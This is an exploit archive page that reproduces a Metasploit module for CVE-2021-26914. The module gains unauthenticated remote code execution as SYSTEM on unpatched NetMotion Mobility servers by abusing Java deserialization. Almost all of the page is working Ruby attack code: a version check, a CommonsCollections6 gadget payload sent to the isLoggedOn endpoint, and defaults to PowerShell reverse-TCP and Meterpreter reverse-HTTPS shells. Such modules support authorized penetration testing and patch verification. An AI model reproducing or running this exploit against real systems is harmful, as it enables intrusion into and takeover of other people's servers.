what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NetMotion Mobility Server MvcUtil Java Deserialization

NetMotion Mobility Server MvcUtil Java Deserialization
Posted May 18, 2021
Authored by mr_me, wvu | Site metasploit.com

This Metasploit module exploits an unauthenticated Java deserialization in the NetMotion Mobility server's MvcUtil.valueStringToObject() method, as invoked through the /mobility/Menu/isLoggedOn endpoint, to execute code as the SYSTEM account. Mobility server versions 11.x before 11.73 and 12.x before 12.02 are vulnerable. Tested against 12.01.09045 on Windows Server 2016.

tags | exploit, java
systems | windows
advisories | CVE-2021-26914
SHA-256 | 98d5e63a61fd5e20065bed1c5d49729a43d215ca4759d51680b7ba3f830ad751

NetMotion Mobility Server MvcUtil Java Deserialization

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::JavaDeserialization
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell

def initialize(info = {})
super(
update_info(
info,
'Name' => 'NetMotion Mobility Server MvcUtil Java Deserialization',
'Description' => %q{
This module exploits an unauthenticated Java deserialization in the
NetMotion Mobility server's MvcUtil.valueStringToObject() method, as
invoked through the /mobility/Menu/isLoggedOn endpoint, to execute
code as the SYSTEM account.

Mobility server versions 11.x before 11.73 and 12.x before 12.02 are
vulnerable. Tested against 12.01.09045 on Windows Server 2016.
},
'Author' => [
'mr_me', # Discovery and PoC
'wvu' # Module
],
'References' => [
['CVE', '2021-26914'],
['URL', 'https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/'],
['URL', 'https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020'],
['URL', 'https://srcincite.io/advisories/src-2021-0007/']
],
'DisclosureDate' => '2021-02-08', # Public disclosure
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Command',
{
'Arch' => ARCH_CMD,
'Type' => :cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
}
],
[
'Dropper',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :dropper,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
}
}
],
[
'PowerShell',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
}
}
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
IOC_IN_LOGS, # C:\Program Files\NetMotion Server\logs
ARTIFACTS_ON_DISK # CmdStager
]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)

unless (version = parse_version(res))
return CheckCode::Unknown('Failed to parse version from response.')
end

unless vuln_version?(version)
return CheckCode::Safe("NetMotion Mobility #{version} is patched.")
end

CheckCode::Appears("NetMotion Mobility #{version} is unpatched.")
end

def parse_version(res)
return unless res&.code == 200

# <img src='/images/menu_logo.png?version=12.01.09045' alt='Mobility' border='0' class='navLogo'>
res.get_html_document.at('//img[@alt = "Mobility"]/@src').to_s[
%r{^/images/menu_logo\.png\?version=(?<version>[\d.]+)$},
:version # Hat tip @adfoster-r7
]
end

def vuln_version?(version)
@vuln_versions ||=
(11.0...11.73).step(0.01) + # 11.0 through 11.72
(12.0...12.02).step(0.01) # 12.0 through 12.01

@vuln_versions.include?(version.to_f)
end

def exploit
print_status("Executing #{payload_instance.refname} (#{target.name})")

case target['Type']
when :cmd
execute_command(payload.encoded)
when :dropper
execute_cmdstager
when :psh
execute_command(
cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
)
)
end
end

def execute_command(cmd, _opts = {})
# XXX: %Path% is otherwise *only* C:\Program Files\NetMotion Server
cmd.prepend(
'set Path=%Path%;' \
'C:\Windows\System32' \
';' \
'C:\Windows\System32\WindowsPowerShell\v1.0' \
'&&'
)

print_status('Triggering deserialization')
vprint_status("Executing command: #{cmd}")

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/mobility/Menu/isLoggedOn'),
'vars_post' => {
'Mvc_x_Form_x_Name' => go_go_gadget(cmd)
}
)

unless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing
fail_with(Failure::PayloadFailed, 'Failed to trigger deserialization')
end

print_good('Successfully triggered deserialization')
end

def go_go_gadget(cmd)
Rex::Text.encode_base64(
Rex::Text.gzip(
generate_java_deserialization_for_command(
'CommonsCollections6',
'cmd', # cmd.exe
cmd
)
)
)
end

end
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close